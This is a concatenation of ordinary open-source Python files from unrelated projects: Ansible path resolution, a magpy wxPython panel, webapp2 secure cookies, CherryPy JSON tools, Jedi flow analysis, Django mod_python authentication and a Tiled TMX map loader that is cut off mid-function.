os.path.exists(b_file_name) or not os.path.isfile(b_file_name): if not self.path_exists(b_file_name): raise AnsibleFileNotFound("Unable to retrieve file contents", file_name=file_name) try: with open(b_file_name, 'rb') as f: data = f.read() return self._decrypt_if_vault_data(data, b_file_name) except (IOError, OSError) as e: raise AnsibleParserError("an error occurred while trying to read the file '%s': %s" % (file_name, to_native(e)), orig_exc=e) def get_basedir(self): ''' returns the current basedir ''' return self._basedir def set_basedir(self, basedir): ''' sets the base directory, used to find files when a relative path is given ''' if basedir is not None: self._basedir = to_text(basedir) def path_dwim(self, given): ''' make relative paths work like folks expect. ''' given = unquote(given) given = to_text(given, errors='surrogate_or_strict') if given.startswith(to_text(os.path.sep)) or given.startswith(u'~'): path = given else: basedir = to_text(self._basedir, errors='surrogate_or_strict') path = os.path.join(basedir, given) return unfrackpath(path, follow=False) def _is_role(self, path): ''' imperfect role detection, roles are still valid w/o tasks|meta/main.yml|yaml|etc ''' b_path = to_bytes(path, errors='surrogate_or_strict') b_upath = to_bytes(unfrackpath(path, follow=False), errors='surrogate_or_strict') for b_finddir in (b'meta', b'tasks'): for b_suffix in (b'.yml', b'.yaml', b''): b_main = b'main%s' % (b_suffix) b_tasked = os.path.join(b_finddir, b_main) if ( RE_TASKS.search(path) and os.path.exists(os.path.join(b_path, b_main)) or os.path.exists(os.path.join(b_upath, b_tasked)) or os.path.exists(os.path.join(os.path.dirname(b_path), b_tasked)) ): return True return False def path_dwim_relative(self, path, dirname, source, is_role=False): ''' find one file in either a role or playbook dir with or without explicitly named dirname subdirs Used in action plugins and lookups to find supplemental files that could be in either place. ''' search = [] source = to_text(source, errors='surrogate_or_strict') # I have full path, nothing else needs to be looked at if source.startswith(to_text(os.path.sep)) or source.startswith(u'~'): search.append(unfrackpath(source, follow=False)) else: # base role/play path + templates/files/vars + relative filename search.append(os.path.join(path, dirname, source)) basedir = unfrackpath(path, follow=False) # not told if role, but detect if it is a role and if so make sure you get correct base path if not is_role: is_role = self._is_role(path) if is_role and RE_TASKS.search(path): basedir = unfrackpath(os.path.dirname(path), follow=False) cur_basedir = self._basedir self.set_basedir(basedir) # resolved base role/play path + templates/files/vars + relative filename search.append(unfrackpath(os.path.join(basedir, dirname, source), follow=False)) self.set_basedir(cur_basedir) if is_role and not source.endswith(dirname): # look in role's tasks dir w/o dirname search.append(unfrackpath(os.path.join(basedir, 'tasks', source), follow=False)) # try to create absolute path for loader basedir + templates/files/vars + filename search.append(unfrackpath(os.path.join(dirname, source), follow=False)) # try to create absolute path for loader basedir search.append(unfrackpath(os.path.join(basedir, source), follow=False)) # try to create absolute path for dirname + filename search.append(self.path_dwim(os.path.join(dirname, source))) # try to create absolute path for filename search.append(self.path_dwim(source)) for candidate in search: if os.path.exists(to_bytes(candidate, errors='surrogate_or_strict')): break return candidate def path_dwim_relative_stack(self, paths, dirname, source, is_role=False): ''' find one file in first path in stack taking roles into account and adding play basedir as fallback :arg paths: A list of text strings which are the paths to look for the filename in. :arg dirname: A text string representing a directory. The directory is prepended to the source to form the path to search for. :arg source: A text string which is the filename to search for :rtype: A text string :returns: An absolute path to the filename ``source`` if found :raises: An AnsibleFileNotFound Exception if the file is found to exist in the search paths ''' b_dirname = to_bytes(dirname, errors='surrogate_or_strict') b_source = to_bytes(source, errors='surrogate_or_strict') result = None search = [] if source is None: display.warning('Invalid request to find a file that matches a "null" value') elif source and (source.startswith('~') or source.startswith(os.path.sep)): # path is absolute, no relative needed, check existence and return source test_path = unfrackpath(b_source, follow=False) if os.path.exists(to_bytes(test_path, errors='surrogate_or_strict')): result = test_path else: display.debug(u'evaluation_path:\n\t%s' % '\n\t'.join(paths)) for path in paths: upath = unfrackpath(path, follow=False) b_upath = to_bytes(upath, errors='surrogate_or_strict') b_pb_base_dir = os.path.dirname(b_upath) # if path is in role and 'tasks' not there already, add it into the search if (is_role or self._is_role(path)) and b_pb_base_dir.endswith(b'/tasks'): search.append(os.path.join(os.path.dirname(b_pb_base_dir), b_dirname, b_source)) search.append(os.path.join(b_pb_base_dir, b_source)) else: # don't add dirname if user already is using it in source if b_source.split(b'/')[0] != dirname: search.append(os.path.join(b_upath, b_dirname, b_source)) search.append(os.path.join(b_upath, b_source)) # always append basedir as last resort # don't add dirname if user already is using it in source if b_source.split(b'/')[0] != dirname: search.append(os.path.join(to_bytes(self.get_basedir(), errors='surrogate_or_strict'), b_dirname, b_source)) search.append(os.path.join(to_bytes(self.get_basedir(), errors='surrogate_or_strict'), b_source)) display.debug(u'search_path:\n\t%s' % to_text(b'\n\t'.join(search))) for b_candidate in search: display.vvvvv(u'looking for "%s" at "%s"' % (source, to_text(b_candidate))) if os.path.exists(b_candidate): result = to_text(b_candidate) break if result is None: raise AnsibleFileNotFound(file_name=source, paths=[to_native(p) for p in search]) return result def _create_content_tempfile(self, content): ''' Create a tempfile containing defined content ''' fd, content_tempfile = tempfile.mkstemp() f = os.fdopen(fd, 'wb') content = to_bytes(content) try: f.write(content) except Exception as err: os.remove(content_tempfile) raise Exception(err) finally: f.close() return content_tempfile def get_real_file(self, file_path, decrypt=True): """ If the file is vault encrypted return a path to a temporary decrypted file If the file is not encrypted then the path is returned Temporary files are cleanup in the destructor """ if not file_path or not isinstance(file_path, (binary_type, text_type)): raise AnsibleParserError("Invalid filename: '%s'" % to_native(file_path)) b_file_path = to_bytes(file_path, errors='surrogate_or_strict') if not self.path_exists(b_file_path) or not self.is_file(b_file_path): raise AnsibleFileNotFound(file_name=file_path) real_path = self.path_dwim(file_path) try: if decrypt: with open(to_bytes(real_path), 'rb') as f: # Limit how much of the file is read since we do not know # whether this is a vault file and therefore it could be very # large. if is_encrypted_file(f, count=len(b_HEADER)): # if the file is encrypted and no password was specified, # the decrypt call would throw an error, but we check first # since the decrypt function doesn't know the file name data = f.read() if not self._vault.secrets: raise AnsibleParserError("A vault password or secret must be specified to decrypt %s" % to_native(file_path)) data = self._vault.decrypt(data, filename=real_path) # Make a temp file real_path = self._create_content_tempfile(data) self._tempfiles.add(real_path) return real_path except (IOError, OSError) as e: raise AnsibleParserError("an error occurred while trying to read the file '%s': %s" % (to_native(real_path), to_native(e)), orig_exc=e) def cleanup_tmp_file(self, file_path): """ Removes any temporary files created from a previous call to get_real_file. file_path must be the path returned from a previous call to get_real_file. """ if file_path in self._tempfiles: os.unlink(file_path) self._tempfiles.remove(file_path) def cleanup_all_tmp_files(self): for f in self._tempfiles: try: self.cleanup_tmp_file(f) except Exception as e: display.warning("Unable to cleanup temp files: %s" % to_text(e)) def find_vars_files(self, path, name, extensions=None, allow_dir=True): """ Find vars files in a given path with specified name. This will find files in a dir named <name>/ or a file called <name> ending in known extensions. """ b_path = to_bytes(os.path.join(path, name)) found = [] if extensions is None: # Look for file with no extension first to find dir before file extensions = [''] + C.YAML_FILENAME_EXTENSIONS # add valid extensions to name for ext in extensions: if '.' in ext: full_path = b_path + to_bytes(ext) elif ext: full_path = b'.'.join([b_path, to_bytes(ext)]) else: full_path = b_path if self.path_exists(full_path): if self.is_directory(full_path): if allow_dir: found.extend(self._get_dir_vars_files(to_text(full_path), extensions)) else: continue else: found.append(full_path) break return found def _get_dir_vars_files(self, path, extensions): found = [] for spath in sorted(self.list_directory(path)): if not spath.startswith(u'.') and not spath.endswith(u'~'): # skip hidden and backups ext = os.path.splitext(spath)[-1] full_spath = os.path.join(path, spath) if self.is_directory(full_spath) and not ext: # recursive search if dir found.extend(self._get_dir_vars_files(full_spath, extensions)) elif self.is_file(full_spath) and (not ext or to_text(ext) in extensions): # only consider files with valid extensions or no extension found.append(full_spath) return found
hschovanec-usgs/magpy
refs/heads/master
magpy/gui/streampage.py
1
#!/usr/bin/env python from magpy.stream import * from magpy.absolutes import * from magpy.transfer import * from magpy.database import * import wx from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas from matplotlib.backends.backend_wx import NavigationToolbar2Wx from matplotlib.figure import Figure import wx.lib.masked as masked # Subclasses for Menu pages and their controls class StreamPage(wx.Panel): def __init__(self, *args, **kwds): wx.Panel.__init__(self, *args, **kwds) self.comp = ['xyz', 'hdz', 'idf'] self.symbol = ['line', 'point'] self.flagidlist = ['0: normal data', '1: automatically flagged', '2: keep data in any case', '3: remove data', '4: special flag'] self.createControls() self.doLayout() # Widgets def createControls(self): self.lineLabel1 = wx.StaticText(self, label=" ") self.lineLabel2 = wx.StaticText(self, label=" ") self.lineLabel3 = wx.StaticText(self, label=" ") self.lineLabel4 = wx.StaticText(self, label=" ") self.pathLabel = wx.StaticText(self, label="Path/Source:") self.pathTextCtrl = wx.TextCtrl(self, value="") self.fileLabel = wx.StaticText(self, label="File/Table:") self.fileTextCtrl = wx.TextCtrl(self, value="*") self.startdateLabel = wx.StaticText(self, label="Start date:") self.startDatePicker = wx.DatePickerCtrl(self, style=wx.DP_DEFAULT) # the following line produces error in my win xp installation self.startTimePicker = wx.TextCtrl(self, value="00:00:00") self.enddateLabel = wx.StaticText(self, label="End date:") self.endDatePicker = wx.DatePickerCtrl(self, style=wx.DP_DEFAULT) self.endTimePicker = wx.TextCtrl(self, value=datetime.now().strftime('%X')) self.trimStreamButton = wx.Button(self,-1,"Trim timerange",size=(160,30)) self.plotOptionsLabel = wx.StaticText(self, label="Plotting options:") self.flagOptionsLabel = wx.StaticText(self, label="Flagging methods:") self.selectKeysButton = wx.Button(self,-1,"Select Columns",size=(160,30)) self.extractValuesButton = wx.Button(self,-1,"Extract Values",size=(160,30)) self.restoreButton = wx.Button(self,-1,"Restore data",size=(160,30)) self.changePlotButton = wx.Button(self,-1,"Plot Options",size=(160,30)) self.dailyMeansButton = wx.Button(self,-1,"Daily Means",size=(160,30)) self.applyBCButton = wx.Button(self,-1,"Baseline Corr",size=(160,30)) self.flagOutlierButton = wx.Button(self,-1,"Flag Outlier",size=(160,30)) self.flagRangeButton = wx.Button(self,-1,"Flag Range",size=(160,30)) self.flagMinButton = wx.Button(self,-1,"Flag Minimum",size=(160,30)) self.flagMaxButton = wx.Button(self,-1,"Flag Maximum",size=(160,30)) self.xCheckBox = wx.CheckBox(self,label="X ") self.yCheckBox = wx.CheckBox(self,label="Y ") self.zCheckBox = wx.CheckBox(self,label="Z ") self.fCheckBox = wx.CheckBox(self,label="F ") self.FlagIDText = wx.StaticText(self,label="Select Min/Max Flag ID:") self.FlagIDComboBox = wx.ComboBox(self, choices=self.flagidlist, style=wx.CB_DROPDOWN, value=self.flagidlist[3],size=(160,-1)) self.flagSelectionButton = wx.Button(self,-1,"Flag Selection",size=(160,30)) self.flagDropButton = wx.Button(self,-1,"Drop flagged",size=(160,30)) self.flagLoadButton = wx.Button(self,-1,"Load flags",size=(160,30)) self.flagSaveButton = wx.Button(self,-1,"Save flags",size=(160,30)) self.compRadioBox = wx.RadioBox(self, label="Select components", choices=self.comp, majorDimension=3, style=wx.RA_SPECIFY_COLS) self.symbolRadioBox = wx.RadioBox(self, label="Select symbols", choices=self.symbol, majorDimension=2, style=wx.RA_SPECIFY_COLS) self.annotateCheckBox = wx.CheckBox(self,label="annotate") self.errorBarsCheckBox = wx.CheckBox(self,label="error bars") self.confinexCheckBox = wx.CheckBox(self, label="confine time") self.compRadioBox.Disable() self.symbolRadioBox.Disable() def doLayout(self): # A horizontal BoxSizer will contain the GridSizer (on the left) # and the logger text control (on the right): boxSizer = wx.BoxSizer(orient=wx.HORIZONTAL) # A GridSizer will contain the other controls: gridSizer = wx.FlexGridSizer(rows=28, cols=2, vgap=5, hgap=10) # Prepare some reusable arguments for calling sizer.Add(): expandOption = dict(flag=wx.EXPAND) noOptions = dict() emptySpace = '(0,0), noOptions' elemlist = ['self.pathLabel, noOptions', 'self.pathTextCtrl, expandOption', 'self.fileLabel, noOptions', 'self.fileTextCtrl, expandOption', 'self.startdateLabel, noOptions', '(0,0), noOptions', 'self.startDatePicker, expandOption', 'self.startTimePicker, expandOption', 'self.enddateLabel, noOptions', '(0,0), noOptions', 'self.endDatePicker, expandOption', 'self.endTimePicker, expandOption', 'self.trimStreamButton, dict(flag=wx.ALIGN_CENTER)', 'self.restoreButton, dict(flag=wx.ALIGN_CENTER)', 'self.lineLabel1, noOptions', 'self.lineLabel2, noOptions', 'self.plotOptionsLabel, noOptions', '(0,0), noOptions', 'self.selectKeysButton, dict(flag=wx.ALIGN_CENTER)', 'self.changePlotButton, dict(flag=wx.ALIGN_CENTER)', 'self.extractValuesButton, dict(flag=wx.ALIGN_CENTER)', '(0,0), noOptions', 'self.compRadioBox, noOptions', 'self.symbolRadioBox, noOptions', 'self.annotateCheckBox, noOptions', 'self.applyBCButton, dict(flag=wx.ALIGN_CENTER)', 'self.confinexCheckBox, noOptions', 'self.dailyMeansButton, dict(flag=wx.ALIGN_CENTER)', 'self.errorBarsCheckBox, noOptions', '(0,0), noOptions', 'self.lineLabel3, noOptions', 'self.lineLabel4, noOptions', 'self.flagOptionsLabel, noOptions', '(0,0), noOptions', 'self.flagOutlierButton, dict(flag=wx.ALIGN_CENTER)', 'self.flagSelectionButton, dict(flag=wx.ALIGN_CENTER)', 'self.flagRangeButton, dict(flag=wx.ALIGN_CENTER)', 'self.flagDropButton, dict(flag=wx.ALIGN_CENTER)', 'self.flagMinButton, dict(flag=wx.ALIGN_CENTER)', 'self.flagMaxButton, dict(flag=wx.ALIGN_CENTER)', 'self.xCheckBox, noOptions', 'self.yCheckBox, noOptions', 'self.zCheckBox, noOptions', 'self.fCheckBox, noOptions', 'self.FlagIDText, noOptions', 'self.FlagIDComboBox, expandOption', 'self.flagLoadButton, dict(flag=wx.ALIGN_CENTER)', 'self.flagSaveButton, dict(flag=wx.ALIGN_CENTER)', '(0,0), noOptions', '(0,0), noOptions'] # modify look: ReDraw connected to radio and check boxes with dates # buttons automatically redraw the graph #checklist = ['self.'+elem+'CheckBox, noOptions' for elem in KEYLIST] #elemlist.extend(checklist) #elemlist.append('self.DrawButton, dict(flag=wx.ALIGN_CENTER)') # Add the controls to the sizers: for elem in elemlist: control = elem.split(', ')[0] options = elem.split(', ')[1] gridSizer.Add(eval(control), **eval(options)) for control, options in \ [(gridSizer, dict(border=5, flag=wx.ALL))]: boxSizer.Add(control, **options) self.SetSizerAndFit(boxSizer)
yencarnacion/jaikuengine
refs/heads/master
.google_appengine/lib/webapp2-2.3/webapp2_extras/securecookie.py
20
# -*- coding: utf-8 -*- """ webapp2_extras.securecookie =========================== A serializer for signed cookies. :copyright: 2011 by tipfy.org. :license: Apache Sotware License, see LICENSE for details. """ import hashlib import hmac import logging import time from webapp2_extras import json from webapp2_extras import security class SecureCookieSerializer(object): """Serializes and deserializes secure cookie values. Extracted from `Tornado`_ and modified. """ def __init__(self, secret_key): """Initiliazes the serializer/deserializer. :param secret_key: A random string to be used as the HMAC secret for the cookie signature. """ self.secret_key = secret_key def serialize(self, name, value): """Serializes a signed cookie value. :param name: Cookie name. :param value: Cookie value to be serialized. :returns: A serialized value ready to be stored in a cookie. """ timestamp = str(self._get_timestamp()) value = self._encode(value) signature = self._get_signature(name, value, timestamp) return '|'.join([value, timestamp, signature]) def deserialize(self, name, value, max_age=None): """Deserializes a signed cookie value. :param name: Cookie name. :param value: A cookie value to be deserialized. :param max_age: Maximum age in seconds for a valid cookie. If the cookie is older than this, returns None. :returns: The deserialized secure cookie, or None if it is not valid. """ if not value: return None parts = value.split('|') if len(parts) != 3: return None signature = self._get_signature(name, parts[0], parts[1]) if not security.compare_hashes(parts[2], signature): logging.warning('Invalid cookie signature %r', value) return None if max_age is not None: if int(parts[1]) < self._get_timestamp() - max_age: logging.warning('Expired cookie %r', value) return None try: return self._decode(parts[0]) except Exception, e: logging.warning('Cookie value failed to be decoded: %r', parts[0]) return None def _encode(self, value): return json.b64encode(value) def _decode(self, value): return json.b64decode(value) def _get_timestamp(self): return int(time.time()) def _get_signature(self, *parts): """Generates an HMAC signature.""" signature = hmac.new(self.secret_key, digestmod=hashlib.sha1) signature.update('|'.join(parts)) return signature.hexdigest()
MTG/gaia
refs/heads/master
src/bindings/pygaia/mtgdb/__init__.py
1
#!/usr/bin/env python # -*- coding: utf-8 -*- from .collection import Collection from .mtgdbcollection import MtgdbCollection
ET-CS/Simple-Python-Sitemap
refs/heads/master
gen_thumbs.py
1
#!/usr/bin/env python ## Import modules and helper functions import os # Get working directory import os.path; path = os.path.dirname(os.path.abspath(__file__)) # tenjin Template Engine import tenjin # Tenjin.set_template_encoding('cp932') # template encoding from tenjin.helpers import * # Import settings file import settings from selenium import webdriver from PIL import Image # Check if thumbnails available def checkThumbnails(): for key in settings.context['items']: thumbnail = 'thumbs/'+key[0].split('//')[1]+'.png' if not os.path.isfile(path+'/'+thumbnail): print "downloading " + key[0] br = webdriver.PhantomJS() print br.get_window_size() br.set_window_size(1400, 900) print br.get_window_size() br.get(key[0]) br.save_screenshot(thumbnail) if os.path.isfile(path+'/'+thumbnail): im = Image.open(thumbnail) im = im.crop((0, 0, 1400, 900)) im.save(thumbnail); br.quit checkThumbnails()
jymannob/Sick-Beard
refs/heads/development
cherrypy/lib/jsontools.py
80
import sys import cherrypy if sys.version_info >= (2, 6): # Python 2.6: simplejson is part of the standard library import json else: try: import simplejson as json except ImportError: json = None if json is None: def json_decode(s): raise ValueError('No JSON library is available') def json_encode(s): raise ValueError('No JSON library is available') else: json_decode = json.JSONDecoder().decode json_encode = json.JSONEncoder().iterencode def json_in(force=True, debug=False): request = cherrypy.serving.request def json_processor(entity): """Read application/json data into request.json.""" if not entity.headers.get(u"Content-Length", u""): raise cherrypy.HTTPError(411) body = entity.fp.read() try: request.json = json_decode(body) except ValueError: raise cherrypy.HTTPError(400, 'Invalid JSON document') if force: request.body.processors.clear() request.body.default_proc = cherrypy.HTTPError( 415, 'Expected an application/json content type') request.body.processors[u'application/json'] = json_processor def json_out(debug=False): request = cherrypy.serving.request response = cherrypy.serving.response real_handler = request.handler def json_handler(*args, **kwargs): response.headers['Content-Type'] = 'application/json' value = real_handler(*args, **kwargs) return json_encode(value) request.handler = json_handler
wbsoft/frescobaldi
refs/heads/master
frescobaldi_app/widgets/tempobutton.py
3
# This file is part of the Frescobaldi project, http://www.frescobaldi.org/ # # Copyright (c) 2008 - 2014 by Wilbert Berendsen # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # See http://www.gnu.org/licenses/ for more information. """ A button that emits a tempo(int) signal when the user clicks multiple times. """ import time from PyQt5.QtCore import pyqtSignal from PyQt5.QtWidgets import QToolButton import app import icons class TempoButton(QToolButton): """A button the user can tap a tempo on. emits tempo(bpm) when the user clicks the button multiple times. """ tempo = pyqtSignal(int) def __init__(self, icon=None, parent=None): super(TempoButton, self).__init__(parent) self.setIcon(icon or icons.get("media-record")) self.tapStart = 0.0 self.tapTime = 0.0 self.tapCount = 0 self.pressed.connect(self.slotPressed) app.translateUI(self) def translateUI(self): self.setToolTip(_("The tempo is set as you click this button.")) self.setWhatsThis(_( "Tap this button to set the tempo.\n\n" "The average speed of clicking is used; wait 3 seconds to \"reset\".")) def slotPressed(self): self.tapTime, t = time.time(), self.tapTime if 0.1 < self.tapTime - t < 3.0: self.tapCount += 1 bpm = int(60.0 * self.tapCount / (self.tapTime - self.tapStart)) self.tempo.emit(bpm) else: self.tapStart = self.tapTime self.tapCount = 0
wiki05/SublimeJEDI
refs/heads/master
jedi/evaluate/flow_analysis.py
5
from jedi.parser import tree as pr class Status(object): lookup_table = {} def __init__(self, value, name): self._value = value self._name = name Status.lookup_table[value] = self def invert(self): if self is REACHABLE: return UNREACHABLE elif self is UNREACHABLE: return REACHABLE else: return UNSURE def __and__(self, other): if UNSURE in (self, other): return UNSURE else: return REACHABLE if self._value and other._value else UNREACHABLE def __repr__(self): return '<%s: %s>' % (type(self).__name__, self._name) REACHABLE = Status(True, 'reachable') UNREACHABLE = Status(False, 'unreachable') UNSURE = Status(None, 'unsure') def break_check(evaluator, base_scope, stmt, origin_scope=None): from jedi.evaluate.representation import wrap element_scope = wrap(evaluator, stmt.get_parent_scope(include_flows=True)) # Direct parents get resolved, we filter scopes that are separate branches. # This makes sense for autocompletion and static analysis. For actual # Python it doesn't matter, because we're talking about potentially # unreachable code. # e.g. `if 0:` would cause all name lookup within the flow make # unaccessible. This is not a "problem" in Python, because the code is # never called. In Jedi though, we still want to infer types. while origin_scope is not None: if element_scope == origin_scope: return REACHABLE origin_scope = origin_scope.parent return _break_check(evaluator, stmt, base_scope, element_scope) def _break_check(evaluator, stmt, base_scope, element_scope): from jedi.evaluate.representation import wrap element_scope = wrap(evaluator, element_scope) base_scope = wrap(evaluator, base_scope) reachable = REACHABLE if isinstance(element_scope, pr.IfStmt): if element_scope.node_after_else(stmt): for check_node in element_scope.check_nodes(): reachable = _check_if(evaluator, check_node) if reachable in (REACHABLE, UNSURE): break reachable = reachable.invert() else: node = element_scope.node_in_which_check_node(stmt) reachable = _check_if(evaluator, node) elif isinstance(element_scope, (pr.TryStmt, pr.WhileStmt)): return UNSURE # Only reachable branches need to be examined further. if reachable in (UNREACHABLE, UNSURE): return reachable if base_scope != element_scope and base_scope != element_scope.parent: return reachable & _break_check(evaluator, stmt, base_scope, element_scope.parent) return reachable def _check_if(evaluator, node): types = evaluator.eval_element(node) values = set(x.py__bool__() for x in types) if len(values) == 1: return Status.lookup_table[values.pop()] else: return UNSURE
dcroc16/skunk_works
refs/heads/master
google_appengine/lib/django-0.96/django/contrib/auth/handlers/modpython.py
33
from mod_python import apache import os def authenhandler(req, **kwargs): """ Authentication handler that checks against Django's auth database. """ # mod_python fakes the environ, and thus doesn't process SetEnv. This fixes # that so that the following import works os.environ.update(req.subprocess_env) # check for PythonOptions _str_to_bool = lambda s: s.lower() in ('1', 'true', 'on', 'yes') options = req.get_options() permission_name = options.get('DjangoPermissionName', None) staff_only = _str_to_bool(options.get('DjangoRequireStaffStatus', "on")) superuser_only = _str_to_bool(options.get('DjangoRequireSuperuserStatus', "off")) settings_module = options.get('DJANGO_SETTINGS_MODULE', None) if settings_module: os.environ['DJANGO_SETTINGS_MODULE'] = settings_module from django.contrib.auth.models import User from django import db db.reset_queries() # check that the username is valid kwargs = {'username': req.user, 'is_active': True} if staff_only: kwargs['is_staff'] = True if superuser_only: kwargs['is_superuser'] = True try: try: user = User.objects.get(**kwargs) except User.DoesNotExist: return apache.HTTP_UNAUTHORIZED # check the password and any permission given if user.check_password(req.get_basic_auth_pw()): if permission_name: if user.has_perm(permission_name): return apache.OK else: return apache.HTTP_UNAUTHORIZED else: return apache.OK else: return apache.HTTP_UNAUTHORIZED finally: db.connection.close()
th0th/harmony
refs/heads/master
harmony/taghandler.py
1
# -*- coding: utf-8 -*- from mutagen.easyid3 import EasyID3 class TagHandler: def __init__(self): self.mask = None def set_mask(self, mask): self.mask = mask def read_tags(self, filepath): tags = EasyID3(filepath) new_tags = {} for tag in tags: new_tags[tag] = tags[tag][0].encode('utf-8') return new_tags def generate_filename(self, filepath): filename = self.mask.format(**self.read_tags(filepath)) return filename
Rastagong/A-Scholar-In-The-Woods
refs/heads/master
Releases/Post Compo/Sources/narro/tmxreader.py
4
# -*- coding: utf-8 -*- """ TileMap loader for python for Tiled, a generic tile map editor from http://mapeditor.org/ . It loads the \*.tmx files produced by Tiled. """ # Versioning scheme based on: http://en.wikipedia.org/wiki/Versioning#Designating_development_stage # # +-- api change, probably incompatible with older versions # | +-- enhancements but no api change # | | # major.minor[.build[.revision]] # | # +-|* 0 for alpha (status) # |* 1 for beta (status) # |* 2 for release candidate # |* 3 for (public) release # # For instance: # * 1.2.0.1 instead of 1.2-a # * 1.2.1.2 instead of 1.2-b2 (beta with some bug fixes) # * 1.2.2.3 instead of 1.2-rc (release candidate) # * 1.2.3.0 instead of 1.2-r (commercial distribution) # * 1.2.3.5 instead of 1.2-r5 (commercial distribution with many bug fixes) __revision__ = "$Rev: 115 $" __version__ = "3.1.0." + __revision__[6:-2] __author__ = 'DR0ID @ 2009-2011' # import logging # #the following few lines are needed to use logging if this module used without # # a previous call to logging.basicConfig() # if 0 == len(logging.root.handlers): # logging.basicConfig(level=logging.DEBUG) # _LOGGER = logging.getLogger('tiledtmxloader') # if __debug__: # _LOGGER.debug('%s loading ...' % (__name__)) # ----------------------------------------------------------------------------- import sys from xml.dom import minidom, Node try: import io from io import StringIO except: from io import StringIO import os.path import struct import array # ----------------------------------------------------------------------------- class TileMap(object): """ The TileMap holds all the map data. :Ivariables: orientation : string orthogonal or isometric or hexagonal or shifted tilewidth : int width of the tiles (for all layers) tileheight : int height of the tiles (for all layers) width : int width of the map (number of tiles) height : int height of the map (number of tiles) version : string version of the map format tile_sets : list list of TileSet properties : dict the propertis set in the editor, name-value pairs, strings pixel_width : int width of the map in pixels pixel_height : int height of the map in pixels layers : list list of TileLayer map_file_name : dict file name of the map named_layers : dict of string:TledLayer dict containing {name : TileLayer} named_tile_sets : dict dict containing {name : TileSet} """ def __init__(self): # This is the top container for all data. The gid is the global id # (for a image). # Before calling convert most of the values are strings. Some additional # values are also calculated, see convert() for details. After calling # convert, most values are integers or floats where appropriat. """ The TileMap holds all the map data. """ # set through parser self.orientation = None self.tileheight = 0 self.tilewidth = 0 self.width = 0 self.height = 0 self.version = 0 self.tile_sets = [] # TileSet # ISSUE 9: object groups should be in the same order as layers self.layers = [] # WorldTileLayer <- what order? back to front (guessed) # self.object_groups = [] self.properties = {} # {name: value} # additional info self.pixel_width = 0 self.pixel_height = 0 self.named_layers = {} # {name: layer} self.named_tile_sets = {} # {name: tile_set} self.map_file_name = "" def convert(self): """ Converts numerical values from strings to numerical values. It also calculates or set additional data: pixel_width pixel_height named_layers named_tile_sets """ self.tilewidth = int(self.tilewidth) self.tileheight = int(self.tileheight) self.width = int(self.width) self.height = int(self.height) self.pixel_width = self.width * self.tilewidth self.pixel_height = self.height * self.tileheight for layer in self.layers: # ISSUE 9 if not layer.is_object_group: layer.tilewidth = self.tilewidth layer.tileheight = self.tileheight self.named_layers[layer.name] = layer layer.convert() for tile_set in self.tile_sets: self.named_tile_sets[tile_set.name] = tile_set tile_set.spacing = int(tile_set.spacing) tile_set.margin = int(tile_set.margin) for img in tile_set.images: if img.trans: img.trans = (int(img.trans[:2], 16), \ int(img.trans[2:4], 16), \ int(img.trans[4:], 16)) def decode(self): """ Decodes the TileLayer encoded_content and saves it in decoded_content. """ for layer in self.layers: if not layer.is_object_group: layer.decode() # ----------------------------------------------------------------------------- class TileSet(object): """ A tileset holds the tiles and its images. :Ivariables: firstgid : int the first gid of this tileset name : string the name of this TileSet images : list list of TileImages tiles : list list of Tiles indexed_images : dict after calling load() it is dict containing id: image spacing : int the spacing between tiles marging : int the marging of the tiles properties : dict the propertis set in the editor, name-value pairs tilewidth : int the actual width of the tile, can be different from the tilewidth of the map tilehight : int the actual hight of th etile, can be different from the tilehight of the map """ def __init__(self): self.firstgid = 0 self.name = None self.images = [] # TileImage self.tiles = [] # Tile self.indexed_images = {} # {id:image} self.spacing = 0 self.margin = 0 self.properties = {} self.tileheight = 0 self.tilewidth = 0 # ----------------------------------------------------------------------------- class TileImage(object): """ An image of a tile or just an image. :Ivariables: id : int id of this image (has nothing to do with gid) format : string the format as string, only 'png' at the moment source : string filename of the image. either this is set or the content encoding : string encoding of the content trans : tuple of (r,g,b) the colorkey color, raw as hex, after calling convert just a (r,g,b) tuple properties : dict the propertis set in the editor, name-value pairs image : TileImage after calling load the pygame surface """ def __init__(self): self.id = 0 self.format = None self.source = None self.encoding = None # from <data>...</data> self.content = None # from <data>...</data> self.image = None self.trans = None self.properties = {} # {name: value} # ----------------------------------------------------------------------------- class Tile(object): """ A single tile. :Ivariables: id : int id of the tile gid = TileSet.firstgid + Tile.id images : list of :class:TileImage list of TileImage, either its 'id' or 'image data' will be set properties : dict of name:value the propertis set in the editor, name-value pairs """ # [20:22] DR0ID_: to sum up: there are two use cases, # if the tile element has a child element 'image' then tile is # standalone with its own id and # the other case where a tileset is present then it # referes to the image with that id in the tileset def __init__(self): self.id = 0 self.images = [] # uses TileImage but either only id will be set or image data self.properties = {} # {name: value} # ----------------------------------------------------------------------------- class TileLayer(object): """ A layer of the world. :Ivariables: x : int position of layer in the world in number of tiles (not pixels) y : int position of layer in the world in number of tiles (not pixels) width : int number of tiles in x direction height : int number of tiles in y direction pixel_width : int width of layer in pixels pixel_height : int height of layer in pixels name : string name of this layer opacity : float float from 0 (full transparent) to 1.0 (opaque) decoded_content : list list of graphics id going through the map:: e.g [1, 1, 1, ] where decoded_content[0] is (0,0) decoded_content[1] is (1,0) ... decoded_content[w] is (width,0) decoded_content[w+1] is (0,1) ... decoded_content[w * h] is (width,height) usage: graphics id = decoded_content[tile_x + tile_y * width] content2D : list list of list, usage: graphics id = content2D[x][y] """ def __init__(self): self.width = 0 self.height = 0 self.x = 0 self.y = 0 self.pixel_width = 0 self.pixel_height = 0 self.name = None self.opacity = -1 self.encoding = None self.compression = None self.encoded_content = None self.decoded_content = [] self.visible = True self.properties = {} # {name: value} self.content2D = None self.is_object_group = False # ISSUE 9 def decode(self): """ Converts the contents in a list of integers which are the gid of the used tiles. If necessairy it decodes and uncompresses the contents. """ self.decoded_content = [] if self.encoded_content: content = self.encoded_content if self.encoding: if self.encoding.lower() == 'base64': content = decode_base64(content) elif self.encoding.lower() == 'csv': list_of_lines = content.split() for line in list_of_lines: self.decoded_content.extend(line.split(',')) self.decoded_content = list(map(int, \ [val for val in self.decoded_content if 